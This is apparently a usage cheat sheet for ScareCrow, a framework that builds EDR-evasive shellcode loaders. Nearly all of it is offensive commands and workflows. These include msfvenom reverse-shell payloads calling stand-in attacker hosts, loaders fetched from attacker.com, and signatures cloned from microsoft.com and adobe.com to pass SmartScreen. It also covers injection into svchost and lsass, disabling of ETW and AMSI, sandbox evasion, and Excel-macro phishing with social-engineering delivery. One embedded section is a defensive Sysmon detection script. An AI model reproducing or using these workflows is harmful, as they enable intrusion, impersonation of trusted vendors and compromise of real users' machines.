# ScareCrow

ScareCrow is a payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.
## Installation

### Prerequisites

```bash
# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go

# On macOS
brew install mingw-w64 osslsigncode openssl go

# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golang
```

### Build from Source

```bash
# Clone the ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow

# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go

# Verify the build
./ScareCrow -h
```

### Quick Install via Go

```bash
# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest

# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/bin
```
## Quick Start

Generate a basic loader from msfvenom shellcode:

```bash
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin

# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http

# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)
```
## Loader Types

| Type | Flag | Description | Best For |
|---|---|---|---|
| Binary | `-Loader binary` | Standalone executable | Direct execution, reverse shells |
| DLL | `-Loader dll` | Dynamic library for sideloading | DLL injection, process hollowing |
| COM Object | `-Loader control` | COM control object (.scr) | Screensaver execution, UAC bypass |
| Excel Macro | `-Loader excel` | Excel-based delivery | Phishing documents, macro execution |
| MSIExec | `-Loader msiexec` | Windows Installer wrapper | Code execution via MSI, UAC bypass |
| WScript | `-Loader wscript` | Windows Script Host wrapper | VBScript/JScript execution, LOLBin abuse |

### DLL Side-Loading Example

```bash
# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http

# Use a legitimate application to load the DLL:
# place loader.dll next to the legitimate application;
# when the application runs, it loads the DLL
```

### Excel Macro Delivery

```bash
# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# Creates a VBA macro that executes the loader
# Can be embedded in .xls/.xlsm documents
```
## Input Formats

### Raw Shellcode Input

```bash
# Use the -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com

# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.bin
```

### Metasploit Integration

```bash
# Pipe shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
  -f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com

# For a 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
  -f raw > x86.bin && ./ScareCrow -I x86.bin
```

### Cobalt Strike Shellcode

```bash
# Export raw shellcode from the Cobalt Strike beacon
./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery http
```
## Code Signing

### Domain-Based Certificate Cloning

```bash
# Sign with a certificate cloned from a domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365

# ScareCrow clones the legitimate certificate of the specified domain
# Creates a trusted-looking signature that bypasses SmartScreen

# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.com
```

### Certificate Options

```bash
# Sign without a specific domain (self-signed)
./ScareCrow -I payload.bin

# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90

# Use a custom certificate (if available)
./ScareCrow -I payload.bin -domain company.com
```

### Why Code Signing Matters

Signed loaders bypass numerous defenses:

- SmartScreen warning suppression
- Code signature validation in EDRs
- Windows Defender Application Guard bypass
- Trust indicators in file properties
## Encryption

### Encryption Modes

```bash
# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XOR
```

### File Size Comparison

```bash
# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XOR
```
## Process Injection

### Injection Techniques

```bash
# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com

# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe

# Target a specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exe
```

### Process Injection Tactics

```bash
# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com

# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.com
```

### Process Selection Tips

- `svchost.exe` - System service host (trusted)
- `taskhostw.exe` - Task Scheduler host (legitimate)
- `explorer.exe` - Windows Explorer (common)
- `winlogon.exe` - Logon process (high privilege)
- `lsass.exe` - Local Security Authority (protected)
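Both the side-loading layout described earlier (a DLL dropped next to a legitimate executable) and injection into the system processes listed above leave telemetry a defender can match on. As an added example that is not part of the original page or of ScareCrow, the following Python applies two simple rules to constructed Sysmon-style JSON events (EventID 8 CreateRemoteThread and EventID 7 ImageLoad); the field names follow Sysmon's schema, while the sample events, user names and paths are made up.

```python
import json
import ntpath

# Process names the page lists as injection targets; a remote thread created
# in one of them by a binary outside the Windows system directories is flagged.
INJECTION_TARGETS = {"svchost.exe", "taskhostw.exe", "explorer.exe",
                     "winlogon.exe", "lsass.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)

def check_remote_thread(ev):
    """Sysmon EventID 8 (CreateRemoteThread) rule; returns an alert or None."""
    target = ntpath.basename(ev["TargetImage"]).lower()
    if target in INJECTION_TARGETS and not in_system_dir(ev["SourceImage"]):
        return f"remote thread into {target} from {ev['SourceImage']}"
    return None

def check_sideload(ev):
    """Sysmon EventID 7 (ImageLoad) rule: an unsigned DLL loaded from the same
    non-system directory as the host executable (the side-loading layout)."""
    exe_dir = ntpath.dirname(ev["Image"]).lower()
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
    if (exe_dir == dll_dir and not in_system_dir(ev["ImageLoaded"])
            and ev.get("Signed", "false").lower() != "true"):
        return f"unsigned DLL {ev['ImageLoaded']} side-loaded by {ev['Image']}"
    return None

def scan(lines):
    """Apply both rules to newline-delimited JSON events; return alert strings."""
    rules = {8: check_remote_thread, 7: check_sideload}
    alerts = []
    for line in lines:
        ev = json.loads(line)
        rule = rules.get(ev.get("EventID"))
        if rule and (hit := rule(ev)):
            alerts.append(hit)
    return alerts

# Constructed sample events (not real telemetry) using Sysmon-style field names.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 8, "SourceImage": "C:\\Users\\bob\\Downloads\\loader.exe",
                "TargetImage": "C:\\Windows\\System32\\svchost.exe"}),
    json.dumps({"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe",
                "TargetImage": "C:\\Windows\\System32\\svchost.exe"}),
    json.dumps({"EventID": 7, "Image": "C:\\Users\\bob\\Downloads\\Updater.exe",
                "ImageLoaded": "C:\\Users\\bob\\Downloads\\loader.dll", "Signed": "false"}),
]
```

Running `scan(SAMPLE_EVENTS)` yields two alerts: the remote thread from the Downloads folder into svchost.exe and the unsigned loader.dll beside Updater.exe, while the csrss.exe event is ignored because its source lives in System32.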
## Delivery Options

### HTTP Delivery

```bash
# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
  -domain microsoft.com

# Staged delivery - the loader downloads the payload from a URL
./ScareCrow -I payload.bin -delivery http
```

### DNS Delivery

```bash
# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com

# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructure
```

### URL-Based Delivery

```bash
# Specify a custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
  -delivery http -domain microsoft.com

# The file will be downloaded from the specified URL at runtime
```

### No Internet Delivery

```bash
# Embed the payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com

# Useful for offline or isolated environments
```
## EDR Evasion Techniques

### ETW (Event Tracing for Windows) Patching

```bash
# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw

# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rules
```

### AMSI Bypass

```bash
# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi

# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloads
```

### Sleep Obfuscation

```bash
# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep

# The Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patterns
```

### Combined Evasion

```bash
# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
  -noetw -noamsi -nosleep -encryptionmode AES

# Combines multiple evasion techniques
# Most effective against modern EDR solutions
```

### Additional Evasion

- Direct syscall execution (bypasses hooked APIs)
- Unhooking kernel32 functions
- Hardware breakpoint detection bypass
- Sandbox evasion checks
- Timing-based detection avoidance
## Advanced Options

### Custom Passwords

```bash
# Use a custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com

# Password-protects the generated loader
```

### Console Output Control

```bash
# Show the console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com

# Hide the console (default, for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.com
```

### Sandbox Evasion

```bash
# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com

# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMU
```

### File Output Control

```bash
# Specify a custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com

# Change the output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.com
```
## Complete Workflow Examples

### Cobalt Strike Integration

```bash
# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin

# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
  -injection process -process svchost.exe -noetw -noamsi

# 3. Host on a web server
# Place loader.exe on an HTTP server

# 4. Deliver via social engineering
# Email, USB, shared drive, etc.
```

### Sliver Integration

```bash
# 1. Generate Sliver implant shellcode (in the Sliver console)
sliver > generate --mtls localhost --format shellcode > sliver.bin

# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
  -injection self -noetw

# 3. Execute on target
# ./loader.exe (connects back to the Sliver server)
```

### Metasploit Multi-Stage

```bash
# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
  LPORT=4444 -f raw > msfvenom.bin

# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
  -injection process -process explorer.exe -nosleep

# 3. Set up the Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploit
```

### Excel-Based Phishing

```bash
# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# 2. Create Excel document
# Insert the generated macro into Excel

# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"
```
## Troubleshooting

### Build Errors

```bash
# Missing Go installation
# Solution: Install Go 1.16+ from golang.org

# Cannot find mingw-w64
# Solution: apt-get install mingw-w64

# openssl not found
# Solution: apt-get install openssl
```

### Compilation Failures

```bash
# "Invalid argument" error
# Solution: Check shellcode validity - ensure it is in raw binary format

# "Certificate error" when signing
# Solution: Verify the domain is reachable and has a valid certificate

# File generation issues
# Solution: Check write permissions in the current directory
```

### Payload Execution Issues

```bash
# Loader doesn't execute
# Solution: Verify the shellcode format, try a different injection method

# EDR blocking execution
# Solution: Enable the -noetw -noamsi -nosleep flags

# Process injection fails
# Solution: Ensure the target process exists, use -injection self as a fallback
```

### Size Issues

```bash
# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress

# Output binary still detected
# Solution: Regenerate with fresh domain signing, change the encryption mode
```
## Best Practices

### Operational Security

- Always use code signing with legitimate-looking domains
- Rotate domains between campaigns
- Test payloads in an isolated lab environment first
- Monitor for detection patterns on target systems
- Use staged delivery when the network allows

### Evasion Strategy

- Combine multiple evasion techniques (`-noetw`, `-noamsi`, `-nosleep`)
- Vary loader types between targets
- Use process injection into trusted system processes
- Implement sleep obfuscation for long-running operations
- Test against the target's specific EDR solution

### Payload Selection

- Match shellcode size to target constraints
- Use x64 when possible (64-bit Windows is the default)
- Consider network bandwidth for large payloads
- Test callback connectivity before deployment
- Plan for multiple payload attempts

### Post-Exploitation

- Monitor the injected process for suspicious behavior
- Use encrypted communications for C2
- Implement proper logging and audit trails
- Clean up artifacts after operation completion
- Document all activities for IR purposes
## Related Tools

| Tool | Purpose | Use Case |
|---|---|---|
| Donut | Shellcode generation from .NET | .NET assembly execution |
| PEzor | PE obfuscation and evasion | Binary obfuscation |
| Freeze | Anti-debug and anti-analysis | Detection evasion |
| NimCrypt2 | Nim-based encryption | Alternative language approach |
| shhhloader | Shellcode loader framework | Custom loader development |
| Sliver | C2 framework alternative | Command and control |
| Cobalt Strike | Commercial C2 framework | Full-featured red team operations |

### Complementary Techniques

- Use with Atomic Red Team for evasion testing
- Combine with LOLBAS for execution
- Integrate with the Covenant C2 framework
- Pair with Mimikatz for credential theft
- Deploy alongside Empire/PowerEmpire